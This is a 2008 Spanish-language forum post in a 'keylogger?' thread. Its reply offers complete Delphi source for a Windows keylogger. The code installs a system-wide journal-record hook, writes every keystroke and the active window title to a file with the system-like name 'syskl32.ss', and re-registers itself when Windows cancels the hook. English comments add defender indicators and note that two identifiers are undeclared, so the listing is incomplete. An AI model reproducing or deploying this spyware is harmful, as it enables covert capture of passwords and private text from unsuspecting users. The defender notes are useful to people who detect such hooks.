Tema: keylogger?
Antiguo 20-01-2008
javier20 javier20 is offline
Creo que sí. Mira este, por ejemplo: usa hooks (un hook WH_JOURNALRECORD de Windows).

Código Delphi [-]
//keylogger example by stm

program Project2;

uses
windows,messages;

var
// Title of the foreground window that was last written to the log; JHProc
// compares against it so a window header is emitted only when the title changes.
szCurApp: string;
// Handle returned by SetWindowsHookEx for the WH_JOURNALRECORD hook (assigned in the main block).
HookHandle: HHook;
// Message buffer filled by GetMessage in the main loop.
lpMsg: TMsg;

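// Returns the directory part of APath, up to and including the last
// backslash. Returns '' when APath is empty or contains no backslash.
function ExtractFilePath(APath:string):string;
var
LI:Integer;
begin
Result:='';
// Scan from the end so that the LAST backslash decides where the file name
// starts. The separator must be the '\' character: comparing a character
// against an empty literal never matches, which made every call return ''.
for LI:=Length(APath) downto 1 do
 if APath[LI]='\' then
 begin
  Result:=Copy(APath,1,LI);
  Break;
 end;
end;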

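// Returns the directory of the running module (trailing backslash included),
// or '' when the module path cannot be obtained.
function CurrentDir:String;
var
  Buffer:array[0..260] of Char;
  ModulePath:string;
  Len:DWORD;
begin
  // nSize is a character count, not a byte count: Length(Buffer) stays correct
  // whether Char is one or two bytes wide, whereas SizeOf would overstate the
  // capacity for a two-byte Char.
  Len:=GetModuleFileName(0, Buffer, Length(Buffer));
  if Len=0 then
  begin
    // The call failed and Buffer holds no valid data; do not parse it.
    Result:='';
    Exit;
  end;
  // Copy exactly Len characters instead of relying on a terminating #0,
  // which is not guaranteed when the path was truncated to fit the buffer.
  SetString(ModulePath, Buffer, Len);
  Result:=ExtractFilePath(ModulePath);
end;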

// JHProc: callback that the main block of this listing registers with
// SetWindowsHookEx for WH_JOURNALRECORD.
//
// For every WM_KEYDOWN event it opens the file WinPath+'syskl32.ss', appends
// the foreground window title (only when it differs from szCurApp) and a text
// form of the key, then closes the file again.
//
// Parameters:
//   nCode      - hook code; only HC_ACTION is processed.
//   wParam     - not read here; passed on unchanged to CallNextHookEx.
//   EventStrut - the recorded input event (message and paramL are read).
// Returns: always 0; the value returned by CallNextHookEx is discarded.
//
// Defender notes (what this code leaves behind, as visible in the listing):
//   - a WH_JOURNALRECORD hook owned by the process itself, with no injected DLL;
//   - a file with the fixed name 'syskl32.ss' holding '[ window title ]'
//     headers followed by key text;
//   - one CreateFile/WriteFile/CloseHandle cycle on that file per key press,
//     a pattern that file-activity monitoring makes visible.
//
// NOTE(review): WinPath and JHHandle are not declared anywhere in this
// listing; the global that holds the hook handle is named HookHandle.
function JHProc(nCode:integer; wParam: Longint; var EventStrut: TEVENTMSG): Longint; stdcall;
var
szletta,HBuf,ThePath:string;
hFile,BytesWritten:dword;
szCurAppNm:array[0..260] of Char;
Charry:Array[0..1] of Char;
VirtKey,ScanCode:Cardinal;
KeyState:TKeyBoardState;
nametext:Array[0..32] of Char;
begin
if (nCode = HC_ACTION) and (EventStrut.message = WM_KEYDOWN)
  then begin
   // paramL carries the virtual-key code in its low byte and the scan code in
   // the next byte; the scan code is moved to bit 16 upwards before it is
   // passed to GetKeyNameText and ToAscii below.
   VirtKey:=LOBYTE(EventStrut.paramL);
   ScanCode:=HIBYTE(EventStrut.paramL);
   ScanCode:=ScanCode shl 16;
   ThePath:=WinPath+'syskl32.ss';// syskl32.ss is where it stores the logged Keys

   // OPEN_ALWAYS creates the file when it is missing; the pointer is then moved
   // to the end so existing content is appended to, not overwritten.
   // The handle returned by CreateFile is not checked before it is used.
   hFile:=CreateFile(pchar(ThePath), GENERIC_WRITE, FILE_SHARE_WRITE, nil, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
   SetFilePointer(hFile, 0, nil, FILE_END);
   // Title of the window that currently has the foreground.
   GetWindowText(GetForegroundWindow, szCurAppNm, sizeof(szCurAppNm));
   if szCurAppNm <> szCurApp
    then begin
     // Title changed since the last logged key: remember it and write a
     // '[ title ]' header surrounded by CR/LF pairs.
     szCurApp:=szCurAppNm;
     HBuf:=#13#10+#13#10+'[ '+szCurAppNm+' ]'+#13#10;
     WriteFile(hFile, pchar(HBuf)^, length(HBuf), BytesWritten, nil);
    end;
   GetKeyNameText(ScanCode,nametext,sizeof(nametext));
   // Key text selection: Caps Lock and Shift become a single #0 character
   // (still written below, so the file contains NUL bytes), Space becomes a
   // blank, keys whose name is longer than one character are written as
   // '[name]', and anything else is translated with ToAscii using the current
   // keyboard state.
   if VirtKey = VK_CAPITAL then szletta:=#0
   else if VirtKey = VK_SHIFT then szletta:=#0
   else if VirtKey = VK_SPACE then szletta:=' '
   else if lstrlen(nametext) > 1 then szletta:='['+nametext+']'
   else
    begin
     GetKeyboardState(KeyState);
     ToAscii(VirtKey,ScanCode, KeyState, Charry, 0);
     szletta:=Charry;
    end;
   if szletta <> '' then WriteFile(hFile, pchar(szletta)^, length(szletta), BytesWritten, nil);
   CloseHandle(hFile);
  end;
// Pass the event on to the next hook in the chain; the result is ignored.
CallNextHookEx(JHHandle, nCode, wParam, Integer(@EventStrut));
Result:=0;
end;

// Program entry point: registers JHProc as a WH_JOURNALRECORD hook and then
// pumps messages forever.
//
// Defender notes:
//   - The last argument 0 (thread id) with WH_JOURNALRECORD makes this a
//     system-wide input hook that needs no DLL; tooling that enumerates or
//     logs SetWindowsHookEx registrations can surface it.
//   - Windows cancels journal hooks on Ctrl+Esc / Ctrl+Alt+Del and posts
//     WM_CANCELJOURNAL to the installing thread; the loop reacts by
//     registering the hook again, so repeated WH_JOURNALRECORD registrations
//     from one process are a behavioural indicator.
//   - Per Microsoft's documentation, journaling hooks are unsupported starting
//     with Windows 11; confirm the behaviour on the platform being defended.
//   - UnhookWindowsHookEx is never called and the loop has no exit condition;
//     the return values of SetWindowsHookEx and GetMessage are not checked.
begin
HookHandle:=SetWindowsHookEx(WH_JOURNALRECORD, @JHProc, HInstance, 0);
while 1=1
  do begin
   // Block until a message is available, then fetch it.
   WaitMessage;
   GetMessage(lpMsg,0,0,0);
   // The system cancelled the journal hook: register it again.
   if lpMsg.message = WM_CANCELJOURNAL then HookHandle:=SetWindowsHookEx(WH_JOURNALRECORD, @JHProc, HInstance, 0);
  end;
end.